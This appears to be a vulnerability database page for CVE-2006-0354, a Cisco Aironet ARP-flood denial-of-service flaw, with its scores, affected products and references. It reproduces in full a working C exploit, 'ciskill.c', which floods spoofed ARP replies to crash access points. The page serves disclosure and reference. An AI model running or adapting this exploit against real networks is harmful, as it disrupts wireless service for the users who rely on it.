CVE-2006-0354 : Detail

CVE-2006-0354

0.94%V3
Adjacent Network
2006-01-22
19h00 +00:00
2017-10-09
22h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Cisco IOS before 12.3-7-JA2 on Aironet Wireless Access Points (WAP) allows remote authenticated users to cause a denial of service (termination of packet passing or termination of client connections) by sending the management interface a large number of spoofed ARP packets, which creates a large ARP table that exhausts memory, aka Bug ID CSCsc16644.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-399 Category : Resource Management Errors
Weaknesses in this category are related to improper management of system resources.

Metrics

Metrics Score Severity CVSS Vector Source
V2 5.5 AV:A/AC:L/Au:S/C:N/I:N/A:C nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 1447

Publication date : 2006-01-24 23h00 +00:00
Author : Pasv
EDB Verified : Yes

// // Cisco Killer - ciskill.c // // Usage: ./ciskill [device] // // Author: Pasv (pasvninja [at] gmail.com) // // Credit: This exploit takes advantage of a vulnerability that was // discovered by Eric Smith on January 12, 2006 (bid:16217) // // Greets to NW, zimmy, GSO, and the rest. // // Description: The vulnerability exists in the way the affected versions // below handle ARP replies, if enough specially crafted ARP packets are sent // on the network with the affected systems it will cause the access point memory // exhaustion which will in a few seconds (depending on the speed of the attacker // and the memory of the target) crash the system, making all ingoing/outgoing // traffic stopped. // // Disclaimer: I pity the foo who uses this exploit for evil, I take no responsibility // for your actions (like a knife maker). // // Versions affected: // Cisco Aironet 350 IOS // Cisco Aironet 1400 // Cisco Aironet 1300 // Cisco Aironet 1240AG // Cisco Aironet 1230AG // Cisco Aironet 1200 // Cisco Aironet 1130AG // Cisco Aironet 1100 // (this includes most linksys wireless access points) #include <stdio.h> #include <unistd.h> #include <sys/socket.h> #include <net/if.h> #include <netinet/in.h> #include <linux/if_ether.h> #include <linux/sockios.h> // Edit this packet accordingly if the target is picky char pkt[]= // Ethernet header "\xff\xff\xff\xff\xff\xff" // Destination: broadcast "AAAAAA" // Source: 41:41:41:41:41:41 "\x08\x06" // Pkt type: ARP // ARP header "\x00\x01" // Hardware type: Ethernet "\x08\x00" // Protocol: IP "\x06" // Hardware size: 6 "\x04" // Protocol size: 4 "\x00\x02" // Opcode: Reply "AAAAAA" // Sender (Mac): 41:41:41:41:41:41 "AAAA" // Sender (IP): 65.65.65.65 "AAAAAA" // Target (mac): 41:41:41:41:41:41 "AAAA" // Target (IP): 65.65.65.65 ; // End of Packet int main(int argc, char **argv) { FILE *fp; int sock, seed; long count; char *device; in_addr_t addr; struct sockaddr sin; printf("CisKill -- Aironet Cisco Killer\nCoded by: Pasv\nDiscovery credit: Eric Smith\n"); if(getuid()) { printf("Must be root to inject arp packets!\n"); exit(1); } if(argc != 2) { strcpy(device,"wlan0"); } else { device=argv[1]; } fp = fopen("/dev/urandom", "r"); fscanf(fp,"%d", &seed); fclose(fp); srand(seed); memset(&sin, 0, sizeof(sin)); sin.sa_family = AF_UNSPEC; strncpy(sin.sa_data,device, 14); sock = socket(PF_INET, SOCK_PACKET, 0x300); printf("Using device: %s\n\n", device); // stupid printf("Press ctrl+c immediately if you wish to stop\nGoing in 5\n"); sleep(1);printf(" 4\n");sleep(1);printf(" 3\n");sleep(1);printf(" 2\n");sleep(1);printf(" 1!\n");sleep(1); while(1) { addr = (rand()%0xff)+(rand()%0xff)+(rand()%0xff)+(rand()%0xff); pkt[28] = (char)addr; pkt[38] = (char)addr; count++; printf("#:%ld bytes sent: %d (should be 42)\n",count, sendto(sock, pkt, 42, 0, (struct sockaddr *)&sin, sizeof(sin))); } } // milw0rm.com [2006-01-25]

Products Mentioned

Configuraton 0

Cisco>>Aironet_ap1100 >> Version *

Cisco>>Aironet_ap1130ag >> Version *

Cisco>>Aironet_ap1200 >> Version *

Cisco>>Aironet_ap1230ag >> Version *

Cisco>>Aironet_ap1240ag >> Version *

Cisco>>Aironet_ap1300 >> Version *

Cisco>>Aironet_ap1400 >> Version *

Cisco>>Aironet_ap350 >> Version *

References

http://securityreason.com/securityalert/339
Tags : third-party-advisory, x_refsource_SREASON
http://www.osvdb.org/22375
Tags : vdb-entry, x_refsource_OSVDB
http://www.vupen.com/english/advisories/2006/0176
Tags : vdb-entry, x_refsource_VUPEN
http://secunia.com/advisories/18430
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.securityfocus.com/bid/16217
Tags : vdb-entry, x_refsource_BID
http://securitytracker.com/id?1015483
Tags : vdb-entry, x_refsource_SECTRACK